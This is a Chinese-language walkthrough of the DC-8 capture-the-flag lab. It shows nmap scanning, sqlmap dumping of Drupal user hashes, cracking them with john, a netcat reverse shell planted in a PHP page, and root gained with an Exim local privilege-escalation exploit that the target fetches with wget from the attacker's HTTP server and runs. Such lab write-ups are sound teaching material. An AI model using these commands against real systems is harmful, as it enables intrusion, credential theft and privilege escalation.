DC8靶机渗透测试
文章目录
- 一、信息收集
- 1.主机发现
- 2.端口扫描
- 二、漏洞挖掘、利用
- 1.访问靶机 web 服务
- 2.使用 SQLmap 进行爆内容
- 3.使用 john 进行爆破 hash
- 4.目录扫描
- 5.登陆后台进行查找可编辑 PHP 页面
- 6.获取 shell
- 三、提权
- 1.尝试 suid 提权
- 2.使用 python 获得交互式 shell
- 3.尝试使用 exim4 进行提权
环境版本:
- VMware pro 16
- Kali 2021.1(虚拟机)
- DC-8(虚拟机)
一、信息收集
1.主机发现
arp-scan -l
发现靶机 ip 为192.168.1.111
2.端口扫描
nmap -A -p- 192.168.1.111
发现其开启了 22 ssh、80 web服务 drupal cms
二、漏洞挖掘、利用
1.访问靶机 web 服务
对其进行信息收集(遍历网页)
在点击 welcome to dc-8 后发现 url 带了 nid 尝试 SQLmap 梭
2.使用 SQLmap 进行爆内容
sqlmap -u http://192.168.1.111/?nid=1 --dbs
sqlmap -u http://192.168.1.111/?nid=1 -D d7db --tables
sqlmap -u http://192.168.1.111/?nid=1 -D d7db -T users --columns
sqlmap -u http://192.168.1.111/?nid=1 -D d7db -T users -C uid,name,pass --dump
3.使用 john 进行爆破 hash
1)将 pass 内容每行一个保存到 DC7-pass.txt
2)进行爆破
john ./DC7-pass.txt
只爆破出 1 个,测试得知其为 john 账号密码
john turtle
4.目录扫描
进行目录扫描查找入口点
nikto -h 192.168.1.111
5.登陆后台进行查找可编辑 PHP 页面
插入 nc 连接
6.获取 shell
1)靶机监听
nc -lvvp 9999
2)提交表单页面执行 php 代码进行触发
得到靶机 shell
三、提权
1.尝试 suid 提权
find / -perm -u=s -type f 2>/dev/null
发现 exim4
2.使用 python 获得交互式 shell
python -c "import pty;pty.spawn('/bin/sh')"
3.尝试使用 exim4 进行提权
1)查看版本信息
exim4 --version
2)在 kali 中搜索相关漏洞
searchsploit exim 4
使用
Exim 4.87 - 4.91 - Local Privilege Escalation | linux/local/46996.sh
查看 exp 其内容
cd /usr/share/exploitdb/exploits/linux/local
cat 46996.sh
发现两种执行方式,这里我们使用第二种
3)将 exp 复制到桌面
cp /usr/share/exploitdb/exploits/linux/local/46996.sh /root/Desktop/exp.sh
4)查看 exp 格式
vim ./exp.sh
:set ff #查看文件格式
:set ff=unix #更改文件格式
5)使用 python 打开 http 服务进行传输文件
cd /root/Desktop
python -m SimpleHTTPServer 8888
6)靶机 shell 使用 wget 获取文件、利用
cd /tmp #进入tmp目录,我们使用的exp需要写权限,tmp目录所有用户权限均为7
wget http://192.168.1.123:8888/exp.sh #使用wget获取exp
chmod 777 ./exp.sh #增加权限
./exp.sh -m netcat #使用脚本
得到权限
cat /root/flag.txt
总结
